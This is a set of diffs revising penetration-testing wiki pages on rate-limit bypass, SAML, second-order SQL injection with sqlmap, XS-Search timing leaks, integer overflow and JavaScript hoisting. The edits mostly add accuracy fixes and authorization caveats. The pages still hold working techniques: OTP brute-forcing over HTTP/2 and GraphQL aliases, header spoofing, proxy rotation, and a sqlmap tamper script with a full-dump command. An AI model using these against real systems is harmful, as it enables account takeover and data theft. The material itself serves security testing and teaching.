+Test which signal the application uses as the client IP. Spoofable headers matter only when a trusted proxy or the application accepts them from an untrusted client; a secure edge should overwrite them and trust forwarded values only from known proxy hops. Candidate headers include `X-Originating-IP`, `X-Forwarded-For`, `X-Remote-IP`, `X-Remote-Addr`, `X-Client-IP`, `X-Host`, and `X-Forwarded-Host`, including duplicate `X-Forwarded-For` fields. Loopback values are shown for parser testing but can activate separate trust paths, so use controlled addresses first.
 
 ```bash
 X-Originating-IP: 127.0.0.1
@@ -23,7 +23,7 @@ X-Remote-IP: 127.0.0.1
 X-Remote-Addr: 127.0.0.1
 X-Client-IP: 127.0.0.1
 X-Host: 127.0.0.1
-X-Forwared-Host: 127.0.0.1
+X-Forwarded-Host: 127.0.0.1
 
 # Double X-Forwarded-For header example
 X-Forwarded-For:
@@ -32,19 +32,19 @@ X-Forwarded-For: 127.0.0.1
 
 ### Changing Other Headers
 
-Altering other request headers such as the user-agent and cookies is recommended, as these can also be used to identify and track request patterns. Changing these headers can prevent recognition and tracking of the requester's activities.
+Compare other possible limiter keys such as `User-Agent`, device identifiers, and cookies. If rotating one changes the quota while the account and operation remain identical, document that the limiter is keyed to a client-controlled value.
 
 ### Leveraging API Gateway Behavior
 
-Some API gateways are configured to apply rate limiting based on the combination of endpoint and parameters. By varying the parameter values or adding non-significant parameters to the request, it's possible to circumvent the gateway's rate-limiting logic, making each request appear unique. For exmple `/resetpwd?someparam=1`.
+Some API gateways key rate limits on a combination of path and parameters. Varying an ignored parameter, such as `/resetpwd?someparam=1`, can reveal that each syntactically distinct request receives a separate quota.
 
 ### Logging into Your Account Before Each Attempt
 
-Logging into an account before each attempt, or every set of attempts, might reset the rate limit counter. This is especially useful when testing login functionalities. Utilizing a Pitchfork attack in tools like Burp Suite, to rotate credentials every few attempts and ensuring follow redirects are marked, can effectively restart rate limit counters.
+Logging into a controlled account before each attempt, or each small set of attempts, can reveal whether issuing a new session resets the counter. In Burp Intruder, a Pitchfork attack can rotate test credentials or session tokens while following the same redirect flow. Also test whether lockout applies to the account, the source, or both; account lockout must resist distribution across sessions and IP addresses.<sup>[[5]](#references)</sup>
 
 ### Utilizing Proxy Networks
 
-Deploying a network of proxies to distribute the requests across multiple IP addresses can effectively bypass IP-based rate limits. By routing traffic through various proxies, each request appears to originate from a different source, diluting the rate limit's effectiveness.
+With explicit authorization, controlled egress nodes can establish whether a limiter is only source-IP based. Do not use unknown public/open proxies: they can record credentials and may route test traffic through systems whose owners did not consent.
 
 ### Splitting the Attack Across Different Accounts or Sessions
 
@@ -58,14 +58,16 @@ Note that even if a rate limit is in place you should try to see if the response
 
 ### Abusing HTTP/2 multiplexing & request pipelining (2023-2025)
 
-Modern rate–limiter implementations frequently count **TCP connections** (or even individual HTTP/1.1 requests) instead of the *number of HTTP/2 streams* a connection contains. When the same TLS connection is reused, an attacker can open hundreds of parallel streams, each carrying a separate request, while the gateway only deducts *one* request from the quota.
+A misconfigured limiter may count **TCP connections** rather than the HTTP/2 request streams multiplexed inside each connection. Test whether many streams on one authorized connection consume one quota unit or one unit per request; a correct application-level limiter counts the protected operation independently of transport reuse.<sup>[[6]](#references)</sup>
 
 ```bash
-# Send 100 POST requests in a single HTTP/2 connection with curl
-seq 1 100 | xargs -I@ -P0 curl -k --http2-prior-knowledge -X POST \
-  -H "Content-Type: application/json" \
-  -d '{"code":"@"}' https://target/api/v2/verify &>/dev/null
+# Reuse one HTTP/2 connection for 100 requests containing the same test body
+printf '%s\n' '{"code":"000000"}' > post.json
+h2load -n 100 -c 1 -m 100 -d post.json \
+  -H 'content-type: application/json' https://target/api/v2/verify
 ```
+
+The common `seq | xargs curl` pattern starts many curl processes and therefore does **not** demonstrate a single multiplexed connection. For different OTP values on separate streams, use a client such as Turbo Intruder that supports request variation while retaining connections.
 
 If the limiter protects only `/verify` but not `/api/v2/verify`, you can also combine **path confusion** with HTTP/2 multiplexing for *extremely* high-speed OTP or credential brute-forcing.
 
@@ -73,7 +75,7 @@ If the limiter protects only `/verify` but not `/api/v2/verify`, you can also co
 
 ### GraphQL aliases & batched operations
 
-GraphQL allows the client to send **several logically independent queries or mutations in a single request** by prefixing them with *aliases*. Because the server executes every alias but the rate-limiter often counts only *one* request, this is a reliable bypass for login or password-reset throttling.<sup>[[5]](#references)</sup>
+GraphQL aliases allow one operation to invoke a field several times under different response names. If throttling counts only HTTP requests rather than sensitive resolver invocations, aliases can bypass login or password-reset limits; properly instrumented resolvers still enforce a limit per attempt.<sup>[[2]](#references)</sup>
 
 ```graphql
 mutation bruteForceOTP {
@@ -84,9 +86,9 @@ mutation bruteForceOTP {
 }
 ```
 
-Look at the response: exactly one alias will return 200 OK when the correct code is hit, while the others are rate-limited.
+Inspect each alias's field or error entry in the single GraphQL response. There is only one HTTP status for the entire response, so an individual alias does not independently “return 200”; the successful field may instead contain a token while other fields contain errors or null values.
 
-The technique was popularised by PortSwigger’s research on “GraphQL batching & aliases” in 2023 and has been responsible for many recent bug-bounty payouts.<sup>[[2]](#references)</sup>
+PortSwigger's GraphQL testing guidance demonstrates the alias-based rate-limit bypass.<sup>[[2]](#references)</sup>
 
 ### Abuse of *batch* or *bulk* REST endpoints
 
@@ -101,18 +103,18 @@ Some APIs expose helper endpoints such as `/v2/batch` or accept an **array of ob
 
 ### Timing the sliding-window
 
-A classic token-bucket or leaky-bucket limiter *resets* on a fixed time boundary (for example, every minute). If the window is known (e.g. via error messages such as `X-RateLimit-Reset: 27`), fire the maximum allowed number of requests **just before** the bucket resets, then immediately fire another full burst.
+A **fixed-window** limiter resets on a boundary (for example, every minute). If that boundary is known from a response such as `X-RateLimit-Reset: 27`, send the maximum authorized test burst just before it and another immediately afterward. Sliding-window, token-bucket, and leaky-bucket algorithms do not all have the same hard reset behavior.
 
 ```
 |<-- 60 s window ‑->|<-- 60 s window ‑->|
        ######                 ######
 ```
 
-This simple optimisation can more than double your throughput without touching any other bypass technique.
+This boundary burst can approach twice the nominal fixed-window allowance over a short interval.
 
 ### Upgrading to WebSockets / gRPC streaming after the handshake
 
-Many edge rate-limiters only inspect the **initial HTTP request**. Once the connection is upgraded to WebSocket (HTTP 101) or gRPC bidirectional streaming, subsequent messages often bypass request-per-second counters because they are no longer separate HTTP requests. Cloudflare’s own docs note that only the initial upgrade request is subject to WAF/rate-limiting rules; frames sent afterwards are opaque.<sup>[[3]](#references)</sup>
+Some edge products inspect the initial WebSocket upgrade request but not the messages inside the established connection. Cloudflare documents this limitation for its WAF; an application-level WebSocket limiter may still inspect and throttle every message. gRPC behavior depends on the proxy and application and must be tested separately.<sup>[[3]](#references)</sup>
 
 Practical workflow:
 
@@ -128,13 +130,13 @@ grpcurl -d @ -plaintext target.tld:50051 service.VerifyOTP/Stream <<'EOF'
 EOF
 ```
 
-If the login/OTP endpoint exposes both HTTP and WebSocket/gRPC variants, establish the upgraded channel first and then spray codes within that single connection to evade per-request throttles.
+If the same authorized login or OTP operation is exposed through HTTP and WebSocket/gRPC variants, compare whether every message consumes the same logical quota.
 
 ### Exploiting CDN PoP‑sharded counters
 
-Some CDNs shard rate-limit counters **per data center/PoP instead of globally**. Cloudflare explicitly states counters are not shared across data centers.<sup>[[4]](#references)</sup> By routing requests through egress nodes in many regions (residential proxy pools, anycast VPNs, or cloud VMs pinned to different continents), you multiply the allowed throughput: every PoP maintains an independent bucket for the same key.
+Some CDNs shard rate-limit counters **per data center/PoP instead of globally**. Cloudflare documents that its counters are not shared across data centers, which can allow one quota per PoP for the same key.<sup>[[4]](#references)</sup> Validate this only with controlled egress nodes included in the test authorization.
 
-Quick and dirty layout using open proxies (example with `proxychains` + a country‑rotating list):
+Example layout using a tester-owned proxy list:
 
 ```bash
 for p in $(cat proxies.txt); do
@@ -150,7 +152,7 @@ Make sure the limiter key is not per-account; otherwise also rotate user IDs / s
 ## Tools
 
 - [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): Fuzzing tool that supports header randomisation, chunked word-lists and round-robin proxy rotation.
-- [**https://github.com/ustayready/fireprox**](https://github.com/ustayready/fireprox): Automatically creates disposable AWS API Gateway endpoints so every request originates from a different IP address – perfect for defeating IP-based throttling.
+- [**https://github.com/ustayready/fireprox**](https://github.com/ustayready/fireprox): Creates AWS API Gateway endpoints that can be used to evaluate source-IP-based throttling in an authorized environment; usage incurs AWS resources and costs.
 - **Burp Suite – IPRotate + extension**: Uses a pool of SOCKS/HTTP proxies (or AWS API Gateway) to rotate the source IP transparently during *Intruder* and *Turbo Intruder* attacks.
 - **Turbo Intruder (BApp)**: High-performance attack engine supporting HTTP/2 multiplexing; tune `requestsPerConnection` to 100-1000 to collapse hundreds of requests into a single connection.
 
@@ -160,7 +162,7 @@ Make sure the limiter key is not per-account; otherwise also rotate user IDs / s
 - [2] [PortSwigger Web Security Academy – GraphQL API vulnerabilities: Bypassing rate limiting using aliases](https://portswigger.net/web-security/graphql)
 - [3] [Cloudflare Docs – WebSockets & WAF applicability](https://developers.cloudflare.com/network/websockets/)
 - [4] [Cloudflare Docs – Request rate calculation and PoP-local counters](https://developers.cloudflare.com/waf/rate-limiting-rules/request-rate/)
-- [5] [PortSwigger Research – “Bypassing rate limits with GraphQL aliasing” (2023)](https://portswigger.net/research/graphql-authorization-bypass)
-- [6] [PortSwigger Research – “HTTP/2: The Sequel is Always Worse” (connection-based throttling) (2024)](https://portswigger.net/research/http2)
+- [5] [OWASP WSTG — Testing for Weak Lock Out Mechanism](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism)
+- [6] [PortSwigger Research — HTTP/2: The Sequel is Always Worse](https://portswigger.net/research/http2)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/pentesting-web/saml-attacks/saml-basics.md
+++ b/src/pentesting-web/saml-attacks/saml-basics.md
@@ -4,18 +4,18 @@
 
 ## SAML Overview
 
-**Security Assertion Markup Language (SAML)** enables identity providers (IdP) to be utilized for sending authorization credentials to service providers (SP), facilitating single sign-on (SSO). This approach simplifies the management of multiple logins by allowing a single set of credentials to be used across multiple websites. It leverages XML for standardized communication between IdPs and SPs, linking the authentication of user identity with service authorization.
+**Security Assertion Markup Language (SAML)** is an XML-based framework for exchanging assertions between an identity provider (IdP) and a service provider (SP). Assertions can carry authentication, attribute, and authorization-decision statements; the SAML 2.0 Web Browser SSO profile is commonly used to establish an SP session after the IdP authenticates the user.<sup>[[2]](#references)</sup>
 
 ### Comparison between SAML and OAuth
 
-- **SAML** is tailored towards providing enterprises with greater control over SSO login security.
-- **OAuth** is designed to be more mobile-friendly, uses JSON, and is a collaborative effort from companies like Google and Twitter.
+- **SAML 2.0** defines assertions, protocols, bindings, and profiles, including browser SSO. Messages and assertions are XML.
+- **OAuth 2.0** is an authorization framework for delegated access; it is not an authentication protocol and does not require JSON tokens. **OpenID Connect** adds an identity layer and authentication semantics on top of OAuth 2.0.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ## SAML Authentication Flow
 
 **For further details check the full post from [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)**. This is a summary:<sup>[[1]](#references)</sup>
 
-The SAML authentication process involves several steps, as illustrated in the schema:
+The flow below is the common **SP-initiated Web Browser SSO** profile using an HTTP-Redirect `AuthnRequest` and an HTTP-POST `Response`; SAML also supports other bindings and IdP-initiated flows.<sup>[[2]](#references)</sup>
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg](https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg)
 
@@ -55,7 +55,7 @@ Key elements of this request include:
 - **ProtocolBinding**: Defines the transmission method of SAML protocol messages.
 - **saml:Issuer**: Identifies the entity that initiated the request.
 
-Following the SAML Request generation, the SP responds with a **302 redirect**, directing the browser to the IdP with the SAML Request encoded in the HTTP response's **Location** header. The **RelayState** parameter maintains the state information throughout the transaction, ensuring the SP recognizes the initial resource request upon receiving the SAML Response. The **SAMLRequest** parameter is a compressed and encoded version of the raw XML snippet, utilizing Deflate compression and base64 encoding.<sup>[[1]](#references)</sup>
+Following request generation, the SP responds with a **302 redirect** to the IdP. For the HTTP-Redirect binding, `SAMLRequest` is DEFLATE-compressed, base64-encoded, and URL-encoded in the `Location` query string. `RelayState` is opaque state returned by the IdP; the SP must bind or validate it before using it as a post-login destination to avoid open redirects or state confusion.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## SAML Response Example
 
@@ -79,7 +79,7 @@ XML Signatures are versatile, capable of signing an entire XML tree or specific 
 
 ### Basic Structure of XML Signature
 
-An XML Signature consists of essential elements as shown:
+An XML Signature has the following simplified structure; `KeyInfo` is optional, `Object` may repeat, and `SignedInfo` contains one or more `Reference` elements.<sup>[[5]](#references)</sup>
 
 ```xml
 <Signature>
@@ -124,7 +124,7 @@ Each `Reference` element signifies a specific resource being signed, identifiabl
 
    In an enveloped signature, the `ds:Transform` element specifies that it's enveloped through the `enveloped-signature` algorithm.
 
-2. **Enveloping Signature**: Contrasting with enveloped signatures, enveloping signatures wrap the resource being signed.
+2. **Enveloping Signature**: The signed data is stored inside an `Object` element within the `Signature`, and a `Reference` identifies that object.<sup>[[5]](#references)</sup>
 
    Example:
 
@@ -136,13 +136,13 @@ Each `Reference` element signifies a specific resource being signed, identifiabl
                ...
            </ds:Reference>
        </ds:SignedInfo>
-       <samlp:Response ... ID="..." ... >
-           ...
-       </samlp:Response>
+       <ds:Object Id="signed-object">
+           <samlp:Response ... ID="..." ... >...</samlp:Response>
+       </ds:Object>
    </ds:Signature>
    ```
 
-3. **Detached Signature**: This type is separate from the content it signs. The signature and the content exist independently, but a link between the two is maintained.
+3. **Detached Signature**: The signed content is outside the `Signature` element, either as a sibling in the same XML document or as an external resource identified by the reference URI.<sup>[[5]](#references)</sup>
 
    Example:
 
@@ -160,11 +160,14 @@ Each `Reference` element signifies a specific resource being signed, identifiabl
    </ds:Signature>
    ```
 
-In conclusion, XML Signatures provide flexible ways to secure XML documents, with each type serving different structural and security needs.
+SAML implementations most commonly encounter enveloped signatures on the `Response` and/or `Assertion`. Validation must verify both the cryptographic signature and that the application consumes the exact element referenced by `SignedInfo`; merely finding a valid `Signature` somewhere in the document is insufficient.
 
 ## References
 
 - [1] [How to test SAML: a methodology](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
+- [2] [OASIS - SAML V2.0 Technical Overview](https://docs.oasis-open.org/security/saml/Post2.0/sstc-saml-tech-overview-2.0.html)
+- [3] [RFC 6749 - The OAuth 2.0 Authorization Framework](https://www.rfc-editor.org/rfc/rfc6749)
+- [4] [OpenID Connect Core 1.0](https://openid.net/specs/openid-connect-core-1_0.html)
+- [5] [W3C - XML Signature Syntax and Processing Version 1.1](https://www.w3.org/TR/xmldsig-core/)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -1,16 +1,16 @@
-# Second Order Injection with SQLMap
+# Second-Order Injection with sqlmap
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**SQLMap can exploit Second Order SQLis.**\
+**sqlmap can exploit second-order SQL injections.**\
 You need to provide:
 
-- The **request** where the **sqlinjection payload** is going to be saved
+- The **request** where the **SQL injection payload** is going to be saved
 - The **request** where the **payload** will be **executed**
 
 The request where the SQL injection payload is saved is **indicated as in any other injection in sqlmap**. The request **where sqlmap can read the output/execution** of the injection can be indicated with `--second-url` or with `--second-req` if you need to indicate a complete request from a file.<sup>[[2]](#references)</sup>
 
-**Simple second order example:**
+**Simple second-order example:**
 
 ```bash
 #Get the SQL payload execution with a GET to a url
@@ -22,7 +22,7 @@ sqlmap -r login.txt -p username --second-req details.txt
 
 In several cases **this won't be enough** because you will need to **perform other actions** apart from sending the payload and accessing a different page.
 
-When this is needed you can use a **sqlmap tamper**. For example the following script will register a new user **using sqlmap payload as email** and logout.
+When this is needed, you can use a **sqlmap tamper script**. For example, the following script registers a new user **using the sqlmap payload as the email address** and then logs out.
 
 ```python
 #!/usr/bin/env python
@@ -52,7 +52,7 @@ def tamper(payload, **kwargs):
     return payload
 ```
 
-A **SQLMap tamper is always executed before starting a injection try with a payload** **and it has to return a payload**. In this case we don't care about the payload but we care about sending some requests, so the payload isn't changed.
+A **sqlmap tamper function runs for each payload transformation attempt and must return a payload**. In this case the auxiliary requests matter, so the function returns the payload unchanged.<sup>[[1]](#references)</sup>
 
 So, if for some reason we need a more complex flow to exploit the second order SQL injection like:
 
@@ -66,16 +66,16 @@ So, if for some reason we need a more complex flow to exploit the second order S
 ```bash
 sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
 ##########
-# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
+# --tamper tamper.py : Executes the tamper for each SQL injection payload
 # -r login.txt : Indicates the request to send the SQLi payload
 # -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
-# --second-req second.txt : Request to send to execute the SQLi and get the ouput
+# --second-req second.txt : Request that executes the SQLi and returns the output
 # --proxy http://127.0.0.1:8080 : Use this proxy
 # --technique=U : Help sqlmap indicating the technique to use
 # --dbms mysql : Help sqlmap indicating the dbms
 # --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
 # --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
-# -a : Dump all
+# -a : Retrieve everything; use only when the engagement scope permits it
 ```
 
 ## Useful switches in real second-order flows
@@ -142,4 +142,3 @@ This pattern is especially useful when the payload is stored in places such as:<
 - [2] [Second Order SQLi: Automating with sqlmap](https://jlajara.gitlab.io/Second_order_sqli)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
+++ b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
@@ -1,15 +1,15 @@
-# performance.now + Force heavy task
+# `performance.now()` + Forced Heavy Task
 
 {{#include ../../banners/hacktricks-training.md}}
 
 **Exploit taken from [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**<sup>[[1]](#references)</sup>
 
-In this challenge the user could sent thousands of chars and if the flag was contained, the chars would be sent back to the bot. So putting a big amount of chars the attacker could measure if the flag was containing in the sent string or not.
+In this challenge, the user could send thousands of characters. When the candidate flag substring matched, that large string was reflected to the bot. The attacker could therefore distinguish a matching candidate by measuring the extra work caused by the much larger response.<sup>[[1]](#references)</sup>
 
 The important idea is that the **oracle is not just the request time**. The attacker intentionally makes one branch do **much more work** than the other one, and then measures the difference with `performance.now()` around an embedded cross-origin navigation. In practice the extra work can come from **larger reflected HTML/text**, **more DOM nodes to parse/layout/paint**, or even **expensive validation/highlighting logic** that only happens in one branch.<sup>[[2]](#references)</sup>
 
 > [!WARNING]
-> Initially, I didn’t set object width and height, but later on, I found that it’s important because the default size is too small to make a difference in the load time.
+> In the original challenge, a large explicit object width and height amplified the rendering-time difference; the default viewport was too small to produce a reliable signal.<sup>[[1]](#references)</sup>
 
 ```html
 <!DOCTYPE html>
@@ -123,10 +123,12 @@ If the hit/miss difference is only a few bytes on the wire, the signal is usuall
 - **Keep the embedded viewport large and deterministic:** fixed `width`/`height` on `<object>` or `<iframe>` helps because a tiny default viewport may hide the rendering cost you are trying to amplify.
 - **Use median/average from several runs:** recompute a threshold from a known-hit and a known-miss sample, then classify each candidate with multiple probes instead of trusting one measurement.
 - **If timer precision is coarse, amplify the task more:** a forced branch that regularly creates `50ms+` long tasks can sometimes still be classified with other clocks or `PerformanceObserver`, but only if the branch is truly heavy.
+- **Verify authenticated embedding:** SameSite cookie rules, third-party-cookie restrictions, CSP `frame-ancestors`, X-Frame-Options, CORP, and Fetch Metadata checks can prevent the cross-origin object/frame from reaching the authenticated state whose secret you want to test.<sup>[[2]](#references)</sup>
+- **Add timeouts and error handling:** an `object`/`iframe` load event is not guaranteed. A failed candidate must not stall the entire extraction loop.
 
 ## Browser reality in 2025+
 
-A useful mental model is: **don't depend on ultra-fine timers; depend on a huge workload gap**. Modern browsers coarsen `performance.now()` in non-isolated contexts, so this technique is much more reliable when the hit/miss delta is in the **multi-millisecond** range, not when you are trying to spot tiny sub-millisecond differences.
+A useful mental model is: **do not depend on ultra-fine timers; depend on a huge workload gap**. Browsers coarsen `performance.now()` in non-isolated contexts, so this technique is much more reliable when the hit/miss delta is in the **multi-millisecond** range, not when trying to distinguish tiny sub-millisecond differences.<sup>[[5]](#references)</sup>
 
 In theory you can recover better timer precision from a **cross-origin isolated** page, but in practice that usually conflicts with generic XS-Search targets: isolation requires `COOP: same-origin` plus `COEP: require-corp` or `credentialless`, and `COEP` blocks many arbitrary cross-origin embeds unless the target explicitly opts into `CORP`/`CORS` or is loaded without credentials. For real attacks, assume you will usually be measuring from a **non-isolated attacker page** and design the heavy branch accordingly.<sup>[[4]](#references)</sup>
 
@@ -176,5 +178,6 @@ event-loop-blocking-+-lazy-images.md
 - [2] [XS-Leaks Wiki: Execution Timing](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/)
 - [3] [MDN: PerformanceLongTaskTiming](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming)
 - [4] [PortSwigger Research: Listen to the whispers - web timing attacks that actually work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)
+- [5] [MDN - `Performance.now()` security requirements and reduced precision](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now#security_requirements)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
+++ b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
@@ -221,7 +221,7 @@ The 2025 BLASTPASS analysis showed the vulnerable WebP path was reachable throug
 
 ## 5. Defensive guidelines
 
-1. **Use checked arithmetic**, not merely wider types – for example Rust `checked_add`/`checked_mul`, Java `Math.multiplyExact`, compiler overflow builtins, or explicit precondition checks.
+1. **Use checked arithmetic**, not merely wider types – for example Rust `checked_add`/`checked_mul`, Java `Math.multiplyExact`, compiler overflow builtins, or explicit precondition checks. In Go, `sum, carry := bits.Add64(x, y, 0)` exposes unsigned overflow through a nonzero `carry`, which the caller must reject rather than ignoring.<sup>[[7]](#references)</sup>
 2. **Validate ranges early**: reject any value outside business domain before arithmetic.
 3. **Enable relevant compiler sanitizers**: Clang's `-fsanitize=integer` or targeted signed/unsigned-overflow checks and UBSan during testing. Go's race detector finds data races, not integer overflow.
 4. **Adopt fuzzing in CI/CD** – combine coverage feedback with boundary corpora.
@@ -239,5 +239,6 @@ The 2025 BLASTPASS analysis showed the vulnerable WebP path was reachable throug
 - [4] [Project Zero: Blasting Past WebP](https://projectzero.google/2025/03/blasting-past-webp.html)
 - [5] [HackerOne: Safely Handling Large Integers in JSON: Best Practices and Pitfalls](https://www.hackerone.com/blog/safely-handling-large-integers-json-best-practices-and-pitfalls)
 - [6] [PHP manual - Integer overflow and conversion to float](https://www.php.net/manual/en/language.types.integer.php#language.types.integer.overflow)
+- [7] [Go standard library - `math/bits.Add64`](https://pkg.go.dev/math/bits#Add64)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
+++ b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md
@@ -13,7 +13,7 @@
 
 ## 1. Why integer math still matters on the web
 
-Even though most business-logic in modern stacks is written in *memory-safe* languages, the underlying runtime (or third-party libraries) is eventually implemented in C/C++.  Whenever user-controlled numbers are used to allocate buffers, compute offsets, or perform length checks, **a 32-bit or 64-bit wrap-around may transform an apparently harmless parameter into an out-of-bounds read/write, a logic bypass or a DoS**.
+Even though much business logic in modern stacks is written in *memory-safe* languages, runtimes, native extensions, parsers, databases, and FFI boundaries still impose fixed-width integer representations. Whenever user-controlled numbers allocate buffers, compute offsets, or participate in length checks, **wraparound, truncation, or precision loss can transform an apparently harmless parameter into an out-of-bounds access, logic bypass, or denial of service**.
 
 Typical attack surface:
 
@@ -127,23 +127,42 @@ Pay special attention to places where the code:
 
 ## 4. Exploitation patterns
 
-### 4.1 Logic bypass in server-side code (PHP example)
+### 4.1 Logic bypass in fixed-width server-side code
+
+An unchecked 32-bit signed multiplication in Java, C#, a native extension, or a database function can wrap and bypass a later comparison:
+
+```java
+int price = Integer.parseInt(request.getParameter("price")); // cents
+int total = price * 100;                                     // unchecked wrap
+if (total > 1_000_000) throw new IllegalArgumentException("Too expensive");
+// price=21474850 produces -2147482296 after 32-bit wrap and passes the check
+```
+
+Do not copy this model directly to modern PHP: PHP integers use the platform word size, and arithmetic that exceeds `PHP_INT_MAX` is converted to a float rather than silently wrapping as a signed integer. PHP applications can still become vulnerable when values lose precision as floats or are later truncated by a database, binary packing operation, native extension, or FFI boundary.<sup>[[6]](#references)</sup>
+
+The safe form checks the multiplication itself (for example, Java `Math.multiplyExact`) or validates `price <= intdiv(MAX_TOTAL, 100)` before multiplying.
+
+<!-- Historical unsafe PHP-style pseudocode retained for recognizing this anti-pattern in old write-ups:
 ```php
 $price = (int)$_POST['price'];          // expecting cents (0-10000)
 $total = $price * 100;                  // ← 32-bit overflow possible
 if($total > 1000000){
     die('Too expensive');
 }
-/* Sending price=21474850 → $total wraps to ‑2147483648 and check is bypassed */
+/* This does not silently wrap in current PHP; verify the actual runtime/FFI boundary. */
 ```
+-->
 
 ### 4.2 Heap overflow via image decoder (libwebp 0-day)
 The WebP lossless decoder bug behind `CVE-2023-4863` was a good reminder that browser bugs still start with simple arithmetic mistakes around attacker-controlled metadata. In practice, a crafted image can make the decoder build invalid Huffman lookup tables and write past the heap before consistency checks finish. For web testing this means that **image dimensions, chunk sizes, color-table counts and compression metadata** are still first-class attack surface when the browser or the backend parses user-supplied files.
 
-### 4.3 Browser-based XSS/RCE chain
-1. **Integer overflow** in V8 gives arbitrary read/write.
-2. Escape the sandbox with a second bug or call native APIs to drop a payload.
-3. The payload then injects a malicious script into the origin context → stored XSS.
+### 4.3 Browser renderer exploitation chain
+
+1. An **integer overflow** in a browser renderer or JavaScript engine produces memory corruption.
+2. A successful exploit turns that corruption into renderer-process code execution or another powerful primitive.
+3. A separate sandbox escape is normally required for operating-system compromise.
+
+This native RCE path is distinct from XSS. Integer truncation can also lead directly to DOM XSS when it bypasses application validation, as in the next section, but native renderer compromise does not need to “become stored XSS.”
 
 ### 4.4 Web logic bug → DOM XSS via integer truncation
 
@@ -202,9 +221,9 @@ The 2025 BLASTPASS analysis showed the vulnerable WebP path was reachable throug
 
 ## 5. Defensive guidelines
 
-1. **Use wide types or checked math** – e.g., `size_t`, Rust `checked_add`, Go `math/bits.Add64`.
+1. **Use checked arithmetic**, not merely wider types – for example Rust `checked_add`/`checked_mul`, Java `Math.multiplyExact`, compiler overflow builtins, or explicit precondition checks.
 2. **Validate ranges early**: reject any value outside business domain before arithmetic.
-3. **Enable compiler sanitizers**: `-fsanitize=integer`, UBSan, Go race detector.
+3. **Enable relevant compiler sanitizers**: Clang's `-fsanitize=integer` or targeted signed/unsigned-overflow checks and UBSan during testing. Go's race detector finds data races, not integer overflow.
 4. **Adopt fuzzing in CI/CD** – combine coverage feedback with boundary corpora.
 5. **Stay patched** – browser integer overflow bugs are frequently weaponised within weeks.
 
@@ -219,5 +238,6 @@ The 2025 BLASTPASS analysis showed the vulnerable WebP path was reachable throug
 - [3] [NVD: CVE-2024-9123](https://nvd.nist.gov/vuln/detail/CVE-2024-9123)
 - [4] [Project Zero: Blasting Past WebP](https://projectzero.google/2025/03/blasting-past-webp.html)
 - [5] [HackerOne: Safely Handling Large Integers in JSON: Best Practices and Pitfalls](https://www.hackerone.com/blog/safely-handling-large-integers-json-best-practices-and-pitfalls)
+- [6] [PHP manual - Integer overflow and conversion to float](https://www.php.net/manual/en/language.types.integer.php#language.types.integer.overflow)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
+++ b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
@@ -4,9 +4,9 @@
 
 ## Basic Information
 
-In the JavaScript language, a mechanism known as **Hoisting** is described where declarations of variables, functions, classes, or imports are conceptually raised to the top of their scope before the code is executed. This process is automatically performed by the JavaScript engine, which goes through the script in multiple passes.
+**Hoisting** is a common shorthand for the observable behavior by which JavaScript bindings are created during scope instantiation before evaluation reaches their declaration. The source text is not literally moved, and the behavior differs for function declarations, `var`, lexical declarations (`let`, `const`, and `class`), and static imports.<sup>[[2]](#references)</sup>
 
-During the first pass, the engine parses the code to check for syntax errors and transforms it into an abstract syntax tree. This phase includes hoisting, a process where certain declarations are moved to the top of the execution context. If the parsing phase is successful, indicating no syntax errors, the script execution proceeds.
+The engine parses a script or module before evaluating it and creates its bindings as part of declaration instantiation. A syntax error prevents evaluation entirely; hoisting gadgets instead help with **runtime** failures such as an otherwise undeclared identifier.
 
 It is crucial to understand that:
 
@@ -26,7 +26,7 @@ In detail, function declarations exhibit type 1 hoisting behavior. The `var` key
 
 ## Scenarios
 
-Therefore if you have scenarios where you can **Inject JS code after an undeclared object** is used, you could **fix the syntax** by declaring it (so your code gets executed instead of throwing an error):<sup>[[1]](#references)</sup>
+Therefore, if you can inject JavaScript after code that uses an undeclared identifier, a hoisted declaration can prevent the early `ReferenceError` and allow the injected expression to execute:<sup>[[1]](#references)</sup>
 
 ```javascript
